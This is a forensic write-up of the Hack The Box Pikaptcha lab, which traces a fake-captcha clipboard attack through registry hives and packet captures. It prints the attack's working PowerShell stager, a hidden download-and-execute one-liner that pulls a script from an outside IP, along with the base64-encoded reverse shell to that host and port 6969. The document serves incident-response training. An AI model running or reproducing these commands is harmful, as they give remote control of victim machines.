---
title: 'Hack The Box — Pikaptcha Lab Writeup'
---
# Hack The Box — Pikaptcha Lab Writeup
**Overview of attack scenario:**
**Lab Files**: network traffic + endpoint artifacts
### `Tools:`
- Wireshark
- RegistryExplorer
##
**Task1 && Task2:**
**It is crucial to understand any payloads executed on the system for initial access. Analyzing registry hive for user happy grunwald. What is the full command that was run to download and execute the stager? At what time in UTC did the malicious payload execute?**
We open the registry explorer tool and load the `NTUSER.DAT` hive for user Happy Grunwald into it, then navigate to the `RunMRU` registry key, which stores the history of commands executed through the Run dialog box (Windows+R).
**Task 3**:
**The payload which was executed initially downloaded a PowerShell script and executed it in memory. What is sha256 hash of the script?**
We open the PCAP file provided in the lab resources, and from Task1, we know that the script name is `office2024install.ps1`, so we search for it in the HTTP object list and then export it.
We upload this file on VirusTotal to obtain its sha-256 hash.
From our analysis in this task, we know that the victim's IP address is `172.17.79.129`.
**Task 4**:
**To which port did the reverse shell connect?**
Within `office2024install.ps1`, we find the following script:
```
powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIANAAzAC4AMgAwADUALgAxADEANQAuADQANAAiACwANgA5ADYAOQApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=
```
This script is base64-encoded. To get the original Powershell code, we decode it using [CyberChef](https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true,false)Decode_text('UTF-16LE%20(1200)')&input=SkFCakFHd0FhUUJsQUc0QWRBQWdBRDBBSUFCT0FHVUFkd0F0QUU4QVlnQnFBR1VBWXdCMEFDQUFVd0I1QUhNQWRBQmxBRzBBTGdCT0FHVUFkQUF1QUZNQWJ3QmpBR3NBWlFCMEFITUFMZ0JVQUVNQVVBQkRBR3dBYVFCbEFHNEFkQUFvQUNJQU5BQXpBQzRBTWdBd0FEVUFMZ0F4QURFQU5RQXVBRFFBTkFBaUFDd0FOZ0E1QURZQU9RQXBBRHNBSkFCekFIUUFjZ0JsQUdFQWJRQWdBRDBBSUFBa0FHTUFiQUJwQUdVQWJnQjBBQzRBUndCbEFIUUFVd0IwQUhJQVpRQmhBRzBBS0FBcEFEc0FXd0JpQUhrQWRBQmxBRnNBWFFCZEFDUUFZZ0I1QUhRQVpRQnpBQ0FBUFFBZ0FEQUFMZ0F1QURZQU5RQTFBRE1BTlFCOEFDVUFld0F3QUgwQU93QjNBR2dBYVFCc0FHVUFLQUFvQUNRQWFRQWdBRDBBSUFBa0FITUFkQUJ5QUdVQVlRQnRBQzRBVWdCbEFHRUFaQUFvQUNRQVlnQjVBSFFBWlFCekFDd0FJQUF3QUN3QUlBQWtBR0lBZVFCMEFHVUFjd0F1QUV3QVpRQnVBR2NBZEFCb0FDa0FLUUFnQUMwQWJnQmxBQ0FBTUFBcEFIc0FPd0FrQUdRQVlRQjBBR0VBSUFBOUFDQUFLQUJPQUdVQWR3QXRBRThBWWdCcUFHVUFZd0IwQUNBQUxRQlVBSGtBY0FCbEFFNEFZUUJ0QUdVQUlBQlRBSGtBY3dCMEFHVUFiUUF1QUZRQVpRQjRBSFFBTGdCQkFGTUFRd0JKQUVrQVJRQnVBR01BYndCa0FHa0FiZ0JuQUNrQUxnQkhBR1VBZEFCVEFIUUFjZ0JwQUc0QVp3QW9BQ1FBWWdCNUFIUUFaUUJ6QUN3QU1BQXNBQ0FBSkFCcEFDa0FPd0FrQUhNQVpRQnVBR1FBWWdCaEFHTUFhd0FnQUQwQUlBQW9BR2tBWlFCNEFDQUFKQUJrQUdFQWRBQmhBQ0FBTWdBK0FDWUFNUUFnQUh3QUlBQlBBSFVBZEFBdEFGTUFkQUJ5QUdrQWJnQm5BQ0FBS1FBN0FDUUFjd0JsQUc0QVpBQmlBR0VBWXdCckFESUFJQUE5QUNBQUpBQnpBR1VBYmdCa0FHSUFZUUJqQUdzQUlBQXJBQ0FBSWdCUUFGTUFJQUFpQUNBQUt3QWdBQ2dBY0FCM0FHUUFLUUF1QUZBQVlRQjBBR2dBSUFBckFDQUFJZ0ErQUNBQUlnQTdBQ1FBY3dCbEFHNEFaQUJpQUhrQWRBQmxBQ0FBUFFBZ0FDZ0FXd0IwQUdVQWVBQjBBQzRBWlFCdUFHTUFid0JrQUdrQWJnQm5BRjBBT2dBNkFFRUFVd0JEQUVrQVNRQXBBQzRBUndCbEFIUUFRZ0I1QUhRQVpRQnpBQ2dBSkFCekFHVUFiZ0JrQUdJQVlRQmpBR3NBTWdBcEFEc0FKQUJ6QUhRQWNnQmxBR0VBYlFBdUFGY0FjZ0JwQUhRQVpRQW9BQ1FBY3dCbEFHNEFaQUJpQUhrQWRBQmxBQ3dBTUFBc0FDUUFjd0JsQUc0QVpBQmlBSGtBZEFCbEFDNEFUQUJsQUc0QVp3QjBBR2dBS1FBN0FDUUFjd0IwQUhJQVpRQmhBRzBBTGdCR0FHd0FkUUJ6QUdnQUtBQXBBSDBBT3dBa0FHTUFiQUJwQUdVQWJnQjBBQzRBUXdCc0FHOEFjd0JsQUNnQUtRQT0NCg&ieol=CRLF&oeol=CRLF) from Base64, then Decode Text (UTF16-LE).
After decoding it, we see that it creates a reverse shell, which connects to `43.205.115.44` on port `6969`.
**Task 5**:
**For how many seconds was the reverse shell connection established between C2 and the victim's workstation?**
Based on our analysis in the previous tasks, we know that:
1. The C2 IP address is `43.205.115.44`
2. The C2 port is `6969`
3. The victim IP address is `172.17.79.129`
We navigate to the Statistics tab in Wireshark, then choose Conversations, go to the TCP tab, and search for a connection between `172.17.79.129` and `43.205.115.44` on port `6969`.
*<center> TCP conversation showing the reverse shell connection and its duration </center>*
**Task 6**:
**Attacker hosted a malicious Captcha to lure in users. What is the name of the function which contains the malicious payload to be pasted in victim's clipboard?**
From task 1, we know that the malicious payload to be pasted into the victim's clipboard is:
```
powershell -NOP -NonI -W Hidden -Exec Bypass -Command "IEX(New-Object Net.WebClient).DownloadString('http://43.205.115.44/office2024install.ps1')"
```
We search in the packet details for this payload to identify the relevant packet and then follow the HTTP stream for this packet.
Sign in with Wallet
Connect another wallet